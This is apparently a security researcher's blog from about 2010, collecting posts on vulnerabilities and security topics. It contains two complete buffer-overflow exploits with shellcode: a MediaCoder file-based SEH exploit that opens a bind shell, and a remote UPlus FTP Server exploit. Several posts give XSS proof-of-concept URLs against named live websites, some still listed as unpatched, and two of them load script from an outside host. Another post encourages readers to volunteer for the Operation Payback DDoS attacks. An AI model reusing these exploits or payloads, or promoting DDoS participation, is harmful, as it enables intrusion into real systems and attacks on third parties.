MediaCoder v0.7.5.4796 Local Buffer Overflow [ SEH ]

Recently I came across EDB http://www.exploit-db.com/exploits/15630 - MediaCoder v0.7.5.4792 SEH overflow exploit.


So, decided to verify the current release 0.7.5.4796 as well. There is a buffer overflow in this version which can allow an attacker to gain complete control of the system running this application.




Here is the exploit I wrote, for educational purposes only of course. :-)

#!/usr/bin/python


import sys


# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Download: http://www.mediacoderhq.com/getfile.htm?site=download.mediacoderhq.com&file=MediaCoder-0.7.5.4796.exe


print "\n"
print "#"
print "********************************************************************* *"
print "#                                                                                                   #"
print "*  MediaCoder version <=v0.7.5.4796 SEH Buffer Overflow     *"
print "*  Author : Karn Ganeshen                                                           *"
print "*  Date : December 05, 2010                                                        *"
print "*  KarnGaneshen [aT] gmail [d0t] c0m                                        *"
print "*  http://ipositivesecurity.blogspot.com                                        *"
print "#                                                                                                  #"
print "**********************************************************************"
print "#\n"


if len(sys.argv) > 1:
    print "Usage: ./mcoder.py\n"
    sys.exit(1)


junk = "\x41" * 764
nseh = "\xEB\x06\x90\x90"#  Short jump
seh = "\x87\x71\x01\x66" #  0x66017187 / C:\Program Files\MediaCoder\libiconv-2.dll
nops = "\x90" * 24


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62"
"\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73"
"\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e"
"\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44"
"\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35"
"\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b"
"\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69"
"\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d"
"\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54"
"\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54"
"\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34"
"\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56"
"\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61"
"\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a"
"\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42"
"\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38"
"\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c"
"\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32"
"\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c"
"\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52"
"\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75"
"\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55"
"\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61"
"\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e"
"\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69"
"\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b"
"\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c"
"\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a"
"\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62"
"\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44"
"\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34"
"\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37"
"\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e"
"\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47"
"\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72"
"\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78"
"\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59"
"\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33"
"\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69"
"\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39"
"\x6f\x4e\x36\x39\x6f\x38\x50\x43")


more = "\x90" * 10


exploit = junk + nseh + seh + nops + shellcode + more


try:
    f = open("evil.m3u",'w')
    f.write(exploit)
    f.close()
    print "[+] Generating exploit file..."
    print "[+] +++Evil m3u created+++ ^_^\n"
except:
    print "[!] +++Error occured+++ \n"

Update: It's on packetstorm now [ http://packetstormsecurity.org/files/view/99350/mcoder-localBufferOverflow.py.txt ]


Best Regards.

Pro Wikileaks Hacker Groups take action

Okay folks. This is probably the most visible conflict being fought in the cyber world right now.

Several days of DDoS coming back n forth..


Operation Payback is a pro-wikileaks response. It successfully took down mastercard for around 11 hours.

And now Visa.com has been taken down.

If you have available resources [ read: computing power ] and would like to volunteer for Wikileaks support, check here:

http://pastehtml.com/view/1c8i33u.html

You can access Wikileaks here: http://213.251.145.96/ .

ESPN Cricinfo Cross Site Scripting (XSS)

+++About ESPN Cricinfo+++
http://www.cricinfo.com/

+++Affected URL(s)+++
All URLs using vulnerable parameters

+++Vulnerable Parameters / Functions+++
genre
object
template
country
author
site_area

... and perhaps more!

+++PoC+++

http://www.cricinfo.com/talk/content/current/multimedia/feature.html?genre=21'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/australia/content/quote/index.html?object=2'"/><script>alert("XSS from object")</script>
http://www.cricinfo.com/australia/content/team/2.html?template=fixtures'"/><script>alert("XSS from template")</script>
http://www.cricinfo.com/australia/content/player/country.html?country=2'"/><script>alert("XSS from country")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?genre=366'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?author=29'"/><script/XSS/src=http://ha.ckers.org/xss.js>
http://www.cricinfo.com/magazine/content/current/story/magazine/alltime.html?site_area=5'"/><script/XSS/src=http://ha.ckers.org/xss.js>

ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Note: More URLs / parameters may be vulnerable.

Best Regards.

ESPN Global Cross Site Scripting (XSS)

+++About ESPN Global+++
http://espn.go.com

+++Affected URL(s)+++
http://boards.espn.go.com

+++Vulnerable Parameter / Function+++
sport
id
nav

+++PoC+++

http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>

ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Best Regards.

UPlus FTP Server v1.7.1.0.1 remote buffer overflow exploit published

Hi All,

Posted another remote code execution exploit on Exploit-db an hour back. It is published now :-)

###

#!/usr/bin/python

import socket,sys,base64

print """

#

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC

Discovered by : Karn Ganeshen

Author : Karn Ganeshen / corelanc0d3r

KarnGaneshen [aT] gmail [d0t] com

http://ipositivesecurity.blogspot.com

Greetz out to:  corelanc0d3r

http://corelan.be:8800/index.php

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#

"""

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]

# Date Found : July 21, 2010

# Vendor notified on July 23, 2010

# Issue fixed and new version 1.7.1.02 released on July 23, 2010

if len(sys.argv) != 5:

print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"

sys.exit(1)

target = sys.argv[1]

port = int(sys.argv[2])

user = sys.argv[3]

pwd = sys.argv[4]

auth = base64.b64encode(user+":"+pwd)

buf="A"*1963

buf+="\x90"*179

# 165 bytes Calc.exe shellcode / badchars identified and excluded

buf+=("\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"

"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"

"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"

"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"

"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"

"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"

"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"

"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"

"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"

"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"

"\x27\x0c\xbc\x7f\x38")

buf+="\x90"*15

#[ XP SP2 ] -> "\x78\x16\xF3\x77"    #0x77F31678  JMP ESP

buf+="\x78\x16\xF3\x77"

#[ XP SP3 ] -> "\x3F\x71\x49\x7E"   #0x7E49713F  JMP ESP

#buf+="\x3F\x71\x49\x7E"

buf+="\x90"*30

buf+="\x66\x05\x7A\x03"         #ADD AX,037A

buf+="\x66\x05\x7A\x03"         #ADD AX,037A

buf+="\x66\x05\x7A\x03"         #ADD AX,037A

buf+="\x50\xc3"                 #PUSH EAX + RET

print "[+] Launching exploit against " + target + "..."

head = "GET /list.html?path="+buf+" HTTP/1.1 \r\n"

head += "Host: \r\n"

head += "Authorization: Basic "+auth+"\r\n"

try:

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect((target, port))

s.send(head + "\r\n")

print "[!] Payload sent..."

s.close()

except:

    print "[x] Error!"

I actually missed out specifying the bad chars which I excluded while generating the payload. So here they are:

\x0a \x20 \x25 \x26

I should be able to post a video showing how this exploit was prepared & tested. Watch out on this space!

Shoutz to corelanc0d3r! :)

You may also check it out here:

http://www.exploit-db.com/exploits/14496

Update: Advisory published on Secunia -> http://secunia.com/advisories/40771

Best Regards.

2 Remote Buffer Overflow Code Execution Exploits Published

Hey folks,

As of late, I am reading up on buffer overflows. This is one topic I had been escaping for quite a time. All those hexes \x* , CPU Registers [ eip, esp, ecx, ebx eax ], exploit jargon like sled, nops, jmp et all just didn't made any sense. Until few weeks back when I decided to take it head on / [ me beats his chest and roars! ] :D

<-----Rewind----->Back a few weeks from now

I wanted to start up with something new. Had an idea and started researching on it. It is an interesting subject but there's not much of a 'fresh' learning. So, I put it on a pause for a while and decided to start with BoF. Nevertheless, it's going to be useful to many who are freshers or currently in the Information Security domain ofcourse when I complete it. ;)

After going over half-a-dozen quality articles, ability server & sl mail tutorial by guys over at offsec, I began testing on an open-source ftp server - Easy FTP server v1.7.0.11.

For a perfect noobie in BoF, easyftp server was no easy.. :)

Anyways, in around half a day, I could confirm 2 vuln commands in this application. Working on and off along with work at office, I wrote stable Remote Buffer Overflow command execution exploits for each of these. J

<-----quick snip----->

For those who are new at fuzzing and finding buffer overflows, and are looking for a formal book, here is one that I'd recommend ya:

This is a nice book that would take you through basics of fuzzing, gradually introducing you to several fuzzing frameworks available today.

A good read for anyone wanting to learn fuzzing.

Fuzzing... is the first and only book to cover fuzzing from start to finish, bringing disciplined best practices to a technique that has traditionally been implemented informally. The authors begin by reviewing how fuzzing works and outlining its crucial advantages over other security testing methods. Next, they introduce state-of-the-art fuzzing techniques for finding vulnerabilities in network protocols, file formats, and web applications; demonstrate the use of automated fuzzing tools; and present several insightful case histories showing fuzzing at work.

<-----recent----->

I submitted my exploits over to Exploit-db yesterday [ http://www.exploit-db.com/remote/ ] and later in the day, saw they were confirmed as well. :)

<-----today----->

I feel great at this. Though it's simple, now that I know it, the experience which came out of past few weeks is real learning and very interesting.

You may chose to read my exploits here:

Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit (Post Auth)

Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)

Best Regards.

An interesting truth about what motivates us!

What Motivates us!

Came across this YouTube video by guys over at RSAnimate. An awesome animation / presentation on the motivating parameters for an individual and how they differ from the expected norms. A good watch...

Best Regards.

To CISSP Aspirants!

Hi folks,

In June 2009, I cleared ISC2 CISSP exam and posted my CISSP study plan. Since then, I have continuously been receiving comments and requests both on my blog post and offline at my email to share resources which I used to my preparation.

Although I have shared the appropriate websites and forum details in my CISSP Study Plan post above, getting study material together still appears challenging to many candidates. Therefore, I've decided to actively support all you CISSP aspirants through directing you to available study resources.

Request you everyone, please not to ask me for any exam dumps for CISSP study because there aren't any. What I am going to try and help you with would be the study material which you will need in your CISSP preparation.

Please put your request or any concern on my CISSP Study Plan post here http://ipositivesecurity.blogspot.com/2009/06/cissp-my-study-plan.html and I shall try and share the appropriate pointers in this post.

Wish you all the best in your pursuit to CISSP.

Best Regards.

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++
http://en.wikipedia.org/wiki/Mercedes-Benz


+++Affected URL(s)+++
http://www.mercedes-benz.com/


+++Vulnerable Parameter / Function+++
'dsc_wdw'


+++PoC+++
Home Page -> Request Brochure
vuln parameter -> @dsc_wdw


+POST Request+
https://e-services.mercedes-benz.com/Dialog_RQB/RQB;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN


+Parameters+
dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002

Mercedes Benz Ist Notified: January 22, 2010
                                IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=

MTV Ist Notified: January 06, 2010
          IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++

We help transform core processes for greater flexibility, higher efficiency and lower costs. 
http://www.cognizant.com/html/aboutus/about-us.asp

+++Affected URL(s)+++
http://cognizant.com/html/insights/insightslandingpage.asp
-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++
'hidPageID''

+++PoC+++

POST Request

-> Case studies

POST http://cognizant.com/html/insights/insightslandingpage.asp

hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
POST http://cognizant.com/html/insights/insightslandingpage.asp

global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3

Cognizant Ist Notified: February 23, 2010

                IInd Notification: March 29, 2010

Response Received: March 30, 2010

Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.

Backdoor in Seagate..

Yesterday, on March 02, 2010, when I started Seagate Backup Manager from my desktop I had no freakin idea that my AV alerts n HIPS logs are going to scream their lungs out.

I've a 320 gb portable, a 500 gb external n another 500 gb external backup drives. I had the 320 gb plugged in. Upon starting the backup manager, the system came to a disturbingly slow run. A 100% CPU hog started. Ofcourse, at that time, I thought it appeared to be due to the 2 VMs running on my box. Since that hadn't occurred even when I work on my VM lab - around 6 workstation VMs n 2 server VMs - something didn't look right. So I checked & found there is this known bug / behavior with Seagate Backup Manager. Ok, so rebooted the box and started up again with what I had been doing earlier.

And then the AV alert pop ups suddenly seem to go berserk. McAfee AV started detecting n deleting / cleaning up exploits, trojans  n the alerts stood there on the screen.

Here's a portion of alerts screens I captured:

So I decided to check HIPS logs as well. I found there were several continuous attempts to access outlook files and address books, primarily. All were denied, of course.

Here's some of the screens from my box's HIPS logs:

As you can see above, the exploits do not seem specific to windows. There are generic trojans, backdoors, and linux exploits as well. The hips logs also suggest a behavior of a typical trojan / virus attempting to access email program files n address book.

I checked for any outbound connections when I started this app again later . There were no suspicious destinations at all. It appears to me this is kind of a scheduled activity build inside the application. I recall using this app post lunch hours and nothing had came up then.

In my opinion, this is what might have happened when I started the Seagate backup manager:

1. Application gets started, calls 'home'

2. Receives exploits / trojans / virus / backdoor etc.

3. Executes them

After recent Energizer backdoor disclosure, it had been speculated that backdoor was actually being an administrative function for developers. Now looking at yesterday's incident, with another widely used brand, I find the these behaviors could very well be more than just speculations or errors from developers.

It may not be incorrect to consider these incidents as calculated and planned attack vectors. Today when even big corporations are consistently receiving security advisories, then it is impractical to believe the HDD vendors are secure. Compromise of their server(s), responsible for pushing product updates on to the end-clients, can cover a broad target surface for an attacker(s) over a short period of time.

As long as vendors are not held accountable, I believe we cannot expect them to respond proactively. And till then, it remains the responsibility of the Information Security pupils to find the holes n get them fixed, as has been since long.

Please feel free to share your experience and thoughts over this finding / incident.

Best Regards..

Capgemini CTO Blog Cross-Site Scripting (XSS)

+++About Capgemini+++
A global leader in consulting, technology, outsourcing, and local professional services (http://www.capgemini.com/about/)

+++Affected URL(s)+++
http://www.capgemini.com/ctoblog/search_blog.php

+++Vulnerable Parameter / Function+++
'Search'

+++PoC+++

Capgemini Ist Notified: February 18, 2010

Capgemini IInd Notification: March 02, 2010

Response Received: March 02, 2010

Detailed Info Emailed: March 03, 2010

Current Status: Fixed (As of today, March 23, 2010)

Thanks to Richard Fahey @capgemini for his quick response on resolving this issue.

Best Regards.

TVS Star City Cross-Site Scripting (XSS)

+++About TVS Automobiles+++
A Leading automobile company with popular products as TVS Apache, Star City etc having operations in India.

+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.tvsstarcity.com/dealer-locator.asp?id=NEW%20DELHI

+++Vulnerable Parameter(s)+++
'id'

+++PoC+++

Best Regards.

Gulf Business Machines Cross-Site Scripting (XSS)

+++About GBM+++

Founded in 1990, Gulf Business Machines (GBM) is the leading IT solutions providers in the region fulfilling the IT requirements of local, regional and international organisations in the GCC.

A spin-off from IBM, GBM is the sole distributor for IBM 'excluding selected IBM products and services' throughout the GCC, except for Saudi Arabia.

+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.gbm4ibm.com/inside_networking_services.php?m=first
ttp://www.gbm4ibm.com/inside_productshowcase_cisco.php?m=fifth

and more ...

+++Vulnerable Parameter(s)+++
'm'

+++PoC+++

IBM first notified: February 18, 2010
Response: None till date
Public Disclosure: March 01, 2010


Best Regards.

ESPN serving ads to scareware.

Going over ESPN online tonight, I came across this on 'http://games.espn.go.com/frontpage':

Considering this to be a one off random ad, I looked around the site. And these are few of several screens of what I found:

It became apparent these ads were present on majority of ESPN pages. It's your sponsored ad, I know ESPN, but what the heck!

I fired up Sandboxie and opened up this great PC fixer in my sandboxed browser.

 PC MightyMax home page greeted me with its great windows fixer

 I then downloaded what it offered and proceeded with installation.

 

 

 

As soon as installation completed, 2 processes were initiated - pcmm2010.exe and csc.exe.

And scary info popped up on my screen:

 

So my box needs to be fixed, as it says. Go ahead Max..

Moving forth with Buy option, a form appears asking for billing details, credit card information

Next screen needed my e-signature so I must give my date of birth; sure legit :P

Looking at page source during the transaction, it is seen some custom validation happens, I think, for confirming if the credit card, validity date, and cvv are hot or not.

Scroll down a bit and I see this:

After taking the credit card details and basically all PII necessary to make a transaction, a 'one-time' charge is deducted as well.

I've cleared off this mighty fixer from my sandbox. This rogue application - PC MightyMax 2010 - is an example of scareware. Scareware may also be utilized by spyware and / or malware.

From Wikipedia:

Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

In this scenario, the scareware gained the trust of an unsuspecting user browsing through a trusted site - ESPN - and through strategic placement and frequency of its ad throughout the site, got downloaded and installed on user's box.

Upon getting installed, it followed its basic routine of fake scanning and presenting scary results to make user go to its rogue site and proceed with purchase.

If we look at the cost associated with the purchase, it is damn expensive - $29.95 for 14 days + additional one-time charge. Apart from these up front cost, a user is giving away a good share of his/her personally identifiable information as well as credit card details.

From the perspective of one sitting at other end and controlling the rogue application, every installation is in good probability generating commission - the economy behind scarewares.

The process is known for last few years but the quality of scareware marketing campaigns are evolving. 

In essence, ESPN is the primary entity responsible to facilitate fraud in this instance. ESPN's adspace revenue has clearly overlooked the crucial step of verifying the adspace buyers and the kind of ads running on espn.go.com.

Let's see for how long this remains unnoticed.

Best Regards.